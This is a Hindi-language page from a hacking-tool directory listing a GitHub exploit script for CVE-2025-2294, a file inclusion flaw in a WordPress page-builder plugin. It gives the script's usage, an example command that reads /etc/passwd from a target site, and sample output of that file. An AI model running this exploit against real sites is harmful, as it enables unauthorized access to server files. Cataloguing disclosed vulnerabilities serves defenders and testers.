Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2294 — Kubio AI Page Builder <= 2.5.1 - बिना प्रमाणीकरण के लोकल फ़ाइल इन्क्लूज़न | Kitploit
उपकरण/GitHubGitHub/rhz0d/cve-2025-2294
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubrhz0d/cve-2025-2294

CVE-2025-2294

Kubio AI Page Builder <= 2.5.1 - बिना प्रमाणीकरण के लोकल फ़ाइल इन्क्लूज़न

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 Kubio AI Page Builder <= 2.5.1 - बिना प्रमाणीकरण के लोकल फ़ाइल इन्क्लूज़न (Unauthenticated Local File Inclusion)

📝 विवरण

WordPress के लिए Kubio AI Page Builder प्लगइन, संस्करण 2.5.1 तक (समेत) सभी संस्करणों में kubio_hybrid_theme_load_template फ़ंक्शन के माध्यम से लोकल फ़ाइल इन्क्लूज़न (Local File Inclusion) की भेद्यता से ग्रस्त है। यह बिना प्रमाणीकरण वाले हमलावरों को सर्वर पर मनमानी फ़ाइलें शामिल करने और निष्पादित करने में सक्षम बनाता है, जिससे उन फ़ाइलों में मौजूद किसी भी PHP कोड का निष्पादन संभव हो जाता है। इसका उपयोग एक्सेस नियंत्रणों को बायपास करने, संवेदनशील डेटा प्राप्त करने, या उन मामलों में कोड निष्पादन प्राप्त करने के लिए किया जा सकता है जहाँ इमेज और अन्य "सुरक्षित" फ़ाइल प्रकार अपलोड और शामिल किए जा सकते हैं।

  • CVE: CVE-2025-2294
  • CVSS: 9.8 (क्रिटिकल)
  • सार्वजनिक रूप से प्रकाशित: 27 मार्च 2025
  • अंतिम अपडेट: 27 मार्च 2025

💥 शोषण विवरण

यह स्क्रिप्ट Kubio AI Page Builder प्लगइन में मौजूद भेद्यता का शोषण करके सर्वर पर मनमानी फ़ाइलों को शामिल और निष्पादित करती है। यह शोषण बिना प्रमाणीकरण वाले हमलावरों को सर्वर से संवेदनशील फ़ाइलें पढ़ने की अनुमति देता है।

⚙️ आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी

🚀 उपयोग

usage: CVE-2025-2294.py [-h] -u URL [-f FILE]

Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By: rHz0d

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target base URL (e.g., https://example.com)
  -f FILE, --file FILE  File to read (default: /etc/passwd)

📋 उदाहरण

python3 CVE-2025-2294.py -u https://targetwebsite.com -f /etc/passwd

🔍 आउटपुट

[+] Target is vulnerable. Exploiting...
[+] Exploit successful. File content:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
tss:x:101:104:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin


⚠️ अस्वीकरण

यह शोषण केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है। इसे अपने जोखिम पर उपयोग करें।

द्वारा: rHz0d

टूल डाउनलोड करें